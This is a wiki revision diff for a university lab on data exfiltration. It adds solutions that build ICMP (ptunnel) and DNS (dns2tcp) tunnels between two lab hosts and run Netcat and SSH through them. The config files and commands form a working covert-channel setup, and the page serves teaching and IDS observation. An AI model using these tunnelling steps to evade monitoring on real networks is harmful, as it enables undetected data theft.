Show page

Differences

This shows you the differences between two versions of the page.

--- cdci:labs:6 [2020/03/17 01:27]
mihai.chiroiu [06. [20p] ICMP exfiltration]
+++ cdci:labs:6 [2023/06/06 20:09] (current)
mihai.chiroiu
@@ Line 1: / Line 1: @@
+~~SHOWSOLUTION~~
 ====== Lab06. Data exfiltration  ======
+<note warning>
+Important read to be graded!
+{{page>:cdci:rec&nofooter&noeditbutton&noheader}}
+</note>
 ===== Objectives =====
@@ Line 168: / Line 175: @@
 root@h2:/#
-root@h1:/# kill -9 150
-root@h1:/# netstat -nltp
-Active Internet connections (only servers)
-Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
 root@h1:/# ptunnel -p 192.168.16.3 -lp 8080 -da 127.0.0.1 -dp 8080 &
 [2] 161
@@ Line 179: / Line 182: @@
 [inf]: Security features by Sebastien Raveau, <sebastien.raveau@epita.fr>
 [inf]: Relaying packets from incoming TCP streams.
 root@h1:/# netstat -nltp
 Active Internet connections (only servers)
@@ Line 189: / Line 191: @@
 [inf]: Ping proxy is listening in privileged mode.
 TEST
 ^C
 root@h1:/# [inf]: Connection closed or lost.
 [inf]: Session statistics:
 [inf]: I/O:   0.00/  0.00 mb ICMP I/O/R:       25/       4/       0 Loss:  0.0%
+</code>
+</solution>
-root@h1:/#
+==== 07. [20p] DNS exfiltration ====
-root@h1:/#
-root@h1:/# netstat -nltp
+For this exercise we are going to create a DNS tunnel between the two nodes and use it for the Netcat connection. The tool for this is [[http://www.linuxcertif.com/man/1/dns2tcpc/|dns2tcp]]. Use the following configuration for the client/server side.
+  * Client side configuration
+<code>
+# cat .dns2tcprc
+domain = dns2tcp.cdci.ro
+resource = nc
+local_port = 8080
+key = secretkey
+</code>
+  * Server side configuration
+<code>
+# cat .dns2tcpdrc
+listen = 0.0.0.0
+port = 53
+user=nobody
+chroot = /root/
+pid_file = /var/run/dns2tcp.pid
+domain = dns2tcp.cdci.ro
+key = secretkey
+resources = nc:127.0.0.1:8080
+</code>
+To view the traffic you can use tcpdump on the IDS (to view it locally or to transfer it to your computer and open it with Wireshark). For this exercise we strongly encourage you to view the data in Wireshark.
+<solution>
+<code>
+root@h2:/# dns2tcpd -f .dns2tcpdrc
+root@h2:/# netstat -nlup
 Active Internet connections (only servers)
 Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
-tcp        0      0 0.0.0.0:8080            0.0.0.0:*               LISTEN      161/ptunnel
+udp        0      0 0.0.0.0:53              0.0.0.0:*                           428/dns2tcpd
+root@h2:/# nc -l -p 8080 -k
+TEST
+root@h1:/# dns2tcpc -f .dns2tcprc 192.168.16.3 &
+[2] 196
+root@h1:/# Listening on port : 8080
+root@h1:/# netstat -nltp
+Active Internet connections (only servers)
+Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
+tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      196/dns2tcpc
+root@h1:/# nc 127.0.0.1 8080
+TEST
+^C
 </code>
 </solution>
-==== 07. [20p] DNS exfiltration ====
+==== 08. [10p] Secure exfiltration ====
-To view the traffic you can use tcpdump on the IDS (to view it locally or to transfer it to your computer and open it with Wireshark).
+For this exercise use an ICMP tunnel to create an ssh connection.
+To view the traffic you can use tcpdump on the IDS (to view it locally or to transfer it to your computer and open it with Wireshark). For this exercise we strongly encourage you to view the data in Wireshark.
 <solution>
 <code>
-</code>
+root@h2:/# ptunnel &
-</solution>
+[1] 359
+root@h2:/# [inf]: Starting ptunnel v 0.72.
+[inf]: (c) 2004-2011 Daniel Stoedle, <daniels@cs.uit.no>
+[inf]: Security features by Sebastien Raveau, <sebastien.raveau@epita.fr>
+[inf]: Forwarding incoming ping packets over TCP.
+[inf]: Ping proxy is listening in privileged mode.
+root@h2:/# service ssh start
+ * Starting OpenBSD Secure Shell server sshd                                                                           [ OK ]
+root@h2:/# netstat -nltp
+Active Internet connections (only servers)
+Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
+tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      375/sshd
+tcp6       0      0 :::22                   :::*                    LISTEN      375/sshd
+root@h1:/# ptunnel -p 192.168.16.3 -lp 22 -da 127.0.0.1 -dp 22 &
+[2] 171
+root@h1:/# [inf]: Starting ptunnel v 0.72.
+[inf]: (c) 2004-2011 Daniel Stoedle, <daniels@cs.uit.no>
+[inf]: Security features by Sebastien Raveau, <sebastien.raveau@epita.fr>
+[inf]: Relaying packets from incoming TCP streams.
+root@h1:/# netstat -nltp
+Active Internet connections (only servers)
+Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
+tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      171/ptunnel
+root@h1:/# ssh root@127.0.0.1
+[inf]: Incoming connection.
+[evt]: No running proxy thread - starting it.
+[inf]: Ping proxy is listening in privileged mode.
+The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
+ECDSA key fingerprint is SHA256:qjFg8BPsF6kL0bYEjKrAGvLyc4C321orZpOO55jmD+8.
+Are you sure you want to continue connecting (yes/no)? yes
+Warning: Permanently added '127.0.0.1' (ECDSA) to the list of known hosts.
+root@127.0.0.1's password:
+Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-1057-aws x86_64)
+[...]
+Last login: Mon Mar 16 23:11:06 2020 from 192.168.16.2
+root@h2:~#
+</code>
+</solution>

General info CDCI

Lectures

Labs

Assignments

Resources

Useful resources

cdci/labs/6.1584401244.txt.gz · Last modified: 2020/03/17 01:27 by mihai.chiroiu

Show page Old revisions

Media Manager Back to top